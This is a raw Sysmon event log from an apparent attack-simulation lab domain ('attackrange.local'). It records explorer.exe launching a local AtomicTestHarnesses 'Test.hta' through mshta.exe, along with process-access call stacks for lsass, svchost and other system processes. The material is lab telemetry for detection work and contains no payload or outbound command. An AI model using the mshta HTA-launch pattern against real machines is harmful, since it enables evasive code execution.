15:59:18.366{7901BC46-5356-6008-3906-00000000A301}48325492C:\Windows\explorer.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000023472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.379{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding 10341000x800000000000000023471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.335{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.335{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.335{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000023459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.324{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000023458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.319{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.304{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.304{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000023448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.296{7901BC46-5356-6008-3806-00000000A301}3680C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEexplorer.exe "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000023447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 